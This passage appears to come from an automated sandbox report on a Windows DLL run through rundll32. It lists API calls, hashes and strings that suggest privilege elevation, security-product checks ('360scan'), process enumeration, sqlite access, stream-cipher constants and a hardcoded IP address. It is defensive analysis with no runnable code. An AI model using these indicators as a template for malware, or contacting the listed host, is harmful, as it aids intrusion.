                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
                                                                                                  • FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
                                                                                                  • LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
                                                                                                  • malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
                                                                                                  • FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
                                                                                                  • VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
                                                                                                  • free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 3317409091-0
                                                                                                  • Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                                                  • Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
                                                                                                  • Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                                                  • Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
                                                                                                  • String ID: 360util
                                                                                                  • API String ID: 2488163691-2294763832
                                                                                                  • Opcode ID: ba9b85f3e8219bbad665a1013a4ecfff85fbfd5e77b065d066760422abbecf22
                                                                                                  • Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
                                                                                                  • Opcode Fuzzy Hash: ba9b85f3e8219bbad665a1013a4ecfff85fbfd5e77b065d066760422abbecf22
                                                                                                  • Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
                                                                                                  • String ID: /elevated$MPR.dll$runas
                                                                                                  • API String ID: 3400839104-479190379
                                                                                                  • Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                                                  • Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
                                                                                                  • Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                                                  • Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2775880128-0
                                                                                                  • Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                                                  • Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
                                                                                                  • Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                                                  • Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Process$CloseCurrentErrorHandleLastOpenToken$AdjustLookupPrivilegePrivilegesValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 2007143780-0
                                                                                                  • Opcode ID: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                                                  • Instruction ID: d46f0c18e1a39d64aeb05f722a7361000aff992e322ccff9c5dcc36b437ee35a
                                                                                                  • Opcode Fuzzy Hash: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                                                  • Instruction Fuzzy Hash: 2E218032604B4982EB919F61E8583DA63A1FB8CBD5F458035FA9E47B64DF3CC6498B04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: wcschr
                                                                                                  • String ID: \Command$\command$\ddeexec$ifexec$shell$shell\$topic
                                                                                                  • API String ID: 1497570035-2908898620
                                                                                                  • Opcode ID: 12b78799499caf5717bc95cbc03fbabe0b66143b482f3ac1f85879ba428f6373
                                                                                                  • Instruction ID: 575a53dd2e263c1487cf240052cfc12f8aaf5d66da5f39f1f5c7e3cc686b1930
                                                                                                  • Opcode Fuzzy Hash: 12b78799499caf5717bc95cbc03fbabe0b66143b482f3ac1f85879ba428f6373
                                                                                                  • Instruction Fuzzy Hash: F1829472601E4996DB51DF69C8403DE3360FB89BF8F449312AA2D576E5EF78CA89C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1944083165-0
                                                                                                  • Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                                                  • Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
                                                                                                  • Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                                                  • Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Window$From$Pointmemset$??3@MetricsMonitorRectSystem$AncestorDesktopForegroundVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 1557469473-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandlememset$ProcessProcess32_wcsicmp$CreateFileFirstModuleNameNextOpenSessionSnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 2365564757-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
                                                                                                  • String ID: INIT
                                                                                                  • API String ID: 2772675779-4041279936
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DevicesDisplayEnum
                                                                                                  • String ID:
                                                                                                  • API String ID: 2856225746-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValuememmove
                                                                                                  • String ID: 360scan
                                                                                                  • API String ID: 1121107697-2450673717
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionThrow$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3542664073-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                  • API String ID: 1848478996-631824599
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionThrow
                                                                                                  • String ID:
                                                                                                  • API String ID: 432778473-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID: gfffffff
                                                                                                  • API String ID: 2918714741-1523873471
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2-by$expa$nd 3$te k
                                                                                                  • API String ID: 0-3581043453
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2-by$expa$nd 3$te k
                                                                                                  • API String ID: 0-3581043453
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1288253900-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_lmemcmpmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3402243518-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2221118986-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2221118986-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 0-4108050209
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID: 171.8.167.45
                                                                                                  • API String ID: 54951025-2723241389
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1288253900-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1288253900-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: e34852a907321b2c0a310d6cd3ff2b21c578a08cefc5c87ec14e93545dda5b93
                                                                                                  • Instruction ID: d948c05783dfcc8f414146daf0bc33694b5aab0ea18eb2405acab33e08474a3f
                                                                                                  • Opcode Fuzzy Hash: e34852a907321b2c0a310d6cd3ff2b21c578a08cefc5c87ec14e93545dda5b93
                                                                                                  • Instruction Fuzzy Hash: 28C10072B156988BEB96CF19E0447A9B791F388BC0F44C125EF4A43794DB3DD948CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CreateInstance
                                                                                                  • String ID:
                                                                                                  • API String ID: 542301482-0
                                                                                                  • Opcode ID: 9ba50c07b379dcee6a9a5179895c46778ea5610e92a9fedb800ebdaca9c7ea9a
                                                                                                  • Instruction ID: 6ec33ab1fa450f55db5ffdc818d68adc5a85fbeb1e267d9be7ac50433cc14072
                                                                                                  • Opcode Fuzzy Hash: 9ba50c07b379dcee6a9a5179895c46778ea5610e92a9fedb800ebdaca9c7ea9a
                                                                                                  • Instruction Fuzzy Hash: 32014B36704A4582EB52CF25E850399B3B1F398BC8F54C121EB9D43A28DF39CA5AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018006890E), ref: 000000018006A312
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2086374402-0
                                                                                                  • Opcode ID: 9d9455a43dc74bf51e2091ade6c5ea1ecea413f883736bedd6ba7ec65b18e945
                                                                                                  • Instruction ID: 08dfbfac3cec6c5864c5a16d6947d107670323fc72f789c1d02ea2cbe503142f
                                                                                                  • Opcode Fuzzy Hash: 9d9455a43dc74bf51e2091ade6c5ea1ecea413f883736bedd6ba7ec65b18e945
                                                                                                  • Instruction Fuzzy Hash: 03D0C976A36544CBDB81CF65E880A99B7E0F79CB10F04A021FA5687718E63CC999CF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ControlDevice
                                                                                                  • String ID:
                                                                                                  • API String ID: 2352790924-0
                                                                                                  • Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                                                  • Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
                                                                                                  • Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                                                  • Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 177f8ee2743f692e36716a2a554997d0467f8c68d6d750fb2c00205cb33cda91
                                                                                                  • Instruction ID: 8b502c5acc43c6004b24afd0fd0336b4788e737aa2c0bff6db02d3fa280909ba
                                                                                                  • Opcode Fuzzy Hash: 177f8ee2743f692e36716a2a554997d0467f8c68d6d750fb2c00205cb33cda91
                                                                                                  • Instruction Fuzzy Hash: 312272B7F384204BD31DCB69EC52FA936A2B75434C749A02CAA17D3F44EA3DEA158644
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0d4070d62dad6fb19221950d339e204551eb2b97ff41e5b997223ba163090b91
                                                                                                  • Instruction ID: 12f268bea92222b424f458ad524a46b1b1c1500a46f54a4292c27c4605e25c5b
                                                                                                  • Opcode Fuzzy Hash: 0d4070d62dad6fb19221950d339e204551eb2b97ff41e5b997223ba163090b91
                                                                                                  • Instruction Fuzzy Hash: 5E51AC737206448BE758CF3DE845BAD3761F39C38CB545225EA26A7F49DB38E9428B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
                                                                                                  • API String ID: 190572456-2634604785
                                                                                                  • Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                                                  • Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
                                                                                                  • Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                                                  • Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
